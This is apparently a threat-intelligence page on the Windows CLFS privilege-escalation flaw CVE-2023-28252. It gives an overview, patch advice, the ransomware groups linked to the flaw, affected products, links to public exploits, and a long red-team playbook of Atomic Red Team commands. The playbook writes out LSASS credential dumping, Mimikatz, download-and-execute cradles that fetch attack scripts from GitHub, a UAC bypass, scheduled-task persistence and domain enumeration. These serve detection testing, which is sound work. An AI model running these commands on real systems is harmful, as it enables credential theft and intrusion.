CVE-2023-28252
Overview
This vulnerability is an elevation of privilege caused by improper handling of objects in memory within the Windows Common Log File System (CLFS) driver. The root cause lies in a heap-based buffer overflow due to insufficient bounds checking when processing specially crafted log file data. The affected component is the CLFS driver in Microsoft Windows 10 versions including 1809 and others.
Vulnerability Description
Windows Common Log File System Driver Elevation of Privilege Vulnerability
Impact
An attacker with existing low-level privileges on the system can exploit this vulnerability to escalate their privileges to SYSTEM level. No user interaction is required beyond having a valid low-privileged account. This enables full control over the affected Windows system, allowing execution of arbitrary code with elevated rights, potentially leading to complete system compromise and lateral movement within a network environment.
Solution
Microsoft has released security updates addressing this vulnerability for Windows 10 versions 1507, 1607, 1809, 20H2, and 21H2. Administrators should apply the patches as detailed in the Microsoft Security Response Center advisory available at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252. No specific workarounds are recommended; timely installation of the provided updates is essential to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
BrainCipher
|
62 | ransomware.live |
|
nokoyawa
|
36 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the Windows Common Log File System Driver is characterized by an elevation of privilege flaw that can be exploited by attackers to gain unauthorized access to system resources. This issue arises from improper handling of objects in memory, which allows a malicious actor to execute arbitrary code with elevated privileges. The affected systems include various versions of Windows 10, Windows 11, and several Windows Server editions, making it a widespread concern for users and organizations relying on these platforms. The high CVSS score of 7.8 indicates a significant risk, emphasizing the need for immediate attention and remediation.
Attack vectors for this vulnerability primarily involve local exploitation, where an attacker with limited access can execute a specially crafted application to trigger the flaw. This could be achieved through various means, such as social engineering tactics that convince a user to run a malicious program or through the exploitation of existing vulnerabilities in other applications that may allow for code execution. Once the attacker successfully exploits the vulnerability, they can gain elevated privileges, potentially leading to full control over the affected system. This could enable them to install malware, exfiltrate sensitive data, or pivot to other systems within the network, amplifying the risk.
The real-world impact of this vulnerability can be severe, particularly for organizations that manage sensitive information or critical infrastructure. Successful exploitation could lead to data breaches, loss of intellectual property, and significant financial repercussions due to downtime or remediation costs. Additionally, the reputational damage from such incidents can erode customer trust and result in long-term consequences for businesses. For government and defense sectors, the implications could extend to national security, making it imperative for these entities to prioritize the mitigation of such vulnerabilities.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as vendors often release security updates to address known vulnerabilities. Employing intrusion detection systems (IDS) can help identify suspicious activities that may indicate exploitation attempts. Additionally, organizations should conduct regular security audits and vulnerability assessments to identify potential weaknesses in their environments. User education and awareness programs can also play a vital role in preventing exploitation through social engineering tactics.
In conclusion, the elevation of privilege vulnerability in the Windows Common Log File System Driver poses a significant threat to both individual users and organizations. With its potential for exploitation leading to severe consequences, it is essential for stakeholders to remain vigilant and proactive in their security measures. By understanding the technical details, recognizing attack vectors, assessing real-world impacts, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-28252, rising by over 11% to a current level that places it near the top percentile for exploitation likelihood. This upward trend, while not yet rapid, signals growing attacker interest and potential operationalization of this Windows elevation of privilege vulnerability. The continued association with prominent ransomware groups such as BrainCipher, RansomHub, BianLian, and Black Basta underscores the heightened risk of this vulnerability being leveraged in ransomware campaigns, amplifying its impact on affected organizations. Additionally, the emergence of multiple proof-of-concept exploits, including precompiled binaries accessible on public repositories, lowers the barrier for threat actors to weaponize this flaw. Collectively, these developments elevate the threat posture surrounding CVE-2023-28252, suggesting defenders should anticipate increased exploitation attempts and prioritize monitoring for related indicators of compromise. The evolving exploit landscape and ransomware linkage warrant a reassessment of the vulnerability’s risk level, reinforcing its classification as a high-severity threat with growing operational relevance.
Affected Products (15)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 20h2 | All |
cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 21h2 | All |
cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 22h2 | All |
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | N/A |
cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | r2 |
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | N/A |
cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | N/A |
cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2022 | N/A |
cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability
exploits/windows/local/cve_2023_28252_clfs_driver
|
Ricardo Narvaja, Esteban.kazimirow, jheysel-r7 | Unknown | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fortra/CVE-2023-28252
|
fortra | 183 | 44 | 2023-06-27 | View |
|
duck-sec/CVE-2023-28252-Compiled-exe
A modification to fortra's CVE-2023-28252 exploit, compiled to exe
|
duck-sec | 55 | 13 | 2024-01-22 | View |
|
byt3n33dl3/CLFS
it's a CVE-2023-28252 (Patched), but feel free to use it for check any outdated software or reseach
|
byt3n33dl3 | 6 | 0 | 2024-03-21 | View |
|
bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252
The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252
|
bkstephen | 4 | 0 | 2024-01-01 | View |
|
Danasuley/CVE-2023-28252-
Обнаружение эксплойта CVE-2023-28252
|
Danasuley | 0 | 0 | 2023-11-13 | View |
|
726232111/CVE-2023-28252
|
726232111 | 0 | 0 | 2023-08-02 | View |
|
Vulmatch/CVE-2023-28252
The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252
|
Vulmatch | 0 | 0 | 2024-06-16 | View |
Ransomware Groups 2
Threat Feed
21 eventsRansomware group known to exploit this vulnerability (62 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Cobalt Strike, FileZilla, PsExec (36 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Cobalt Strike, FileZilla, PsExec (36 known victims)
Ransomware group known to exploit this vulnerability (26 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (62 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-28252 |
| msrc.microsoft.com |
GitHub CVE
vendor-advisory
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252 |
| packetstormsecurity.com |
NVD API
Exploit
Third Party Advisory
VDB Entry
|
http://packetstormsecurity.com/files/174668/Windows-Common-Log-File-System-Driver-clfs.sys-Privilege-Escalation.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-28252 |